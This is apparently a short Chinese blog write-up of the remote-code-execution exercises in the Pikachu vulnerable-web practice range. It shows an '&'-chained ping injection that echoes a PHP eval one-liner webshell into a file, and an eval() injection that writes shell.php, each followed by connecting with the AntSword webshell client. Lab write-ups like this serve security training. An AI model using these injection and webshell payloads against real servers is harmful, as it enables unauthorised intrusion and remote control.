Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
老赵聊算法、大模型备案9 分钟前
《人工智能拟人化互动服务管理暂行办法(征求意见稿)》深度解读:AI“拟人”时代迎来首个专项监管框架
人工智能·算法·安全·aigc
松涛和鸣13 分钟前
41、Linux 网络编程并发模型总结(select / epoll / fork / pthread)
linux·服务器·网络·网络协议·tcp/ip·算法
Linux Huang15 分钟前
spring注册组件/服务无效,问题排查
大数据·服务器·数据库·spring
心无旁骛~21 分钟前
ModelEngine Nexent 智能体从创建到部署全流程深度体验:自动化利器让 AI 开发效率拉满!
运维·人工智能·自动化
G_H_S_3_21 分钟前
【网络运维】OpenStack镜像管理:Glance篇
linux·运维·openstack
Muscleheng27 分钟前
Linux安装LibreOffice
linux·运维·服务器
bugtraq202129 分钟前
PentestGPT的部署和使用本地大模型的调试记录
linux·服务器·python
信鸽爱好者1 小时前
Windows +VM虚拟机安装github服务器
服务器·windows·ubuntu·机器人·github
广东大榕树信息科技有限公司1 小时前
如何利用机房动环监控系统提升运维效率与安全性?
运维·网络·物联网·国产动环监控系统·动环监控系统
幺零九零零1 小时前
Docker底层-Namespaces
运维·docker·容器
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击03Linux下V2Ray安装配置指南04Claude Code Skills 实用使用手册05电脑检测软件—图吧工具箱06jdk21下载、安装(Windows、Linux、macOS)07UV安装并设置国内源082025-04-03 Latex学习1——本地配置Latex + VScode环境09SQLmap 完整使用指南:环境搭建 + 命令详解 + 实操案例10Web安全中SQL注入绕过WAF的具体手法和实战案例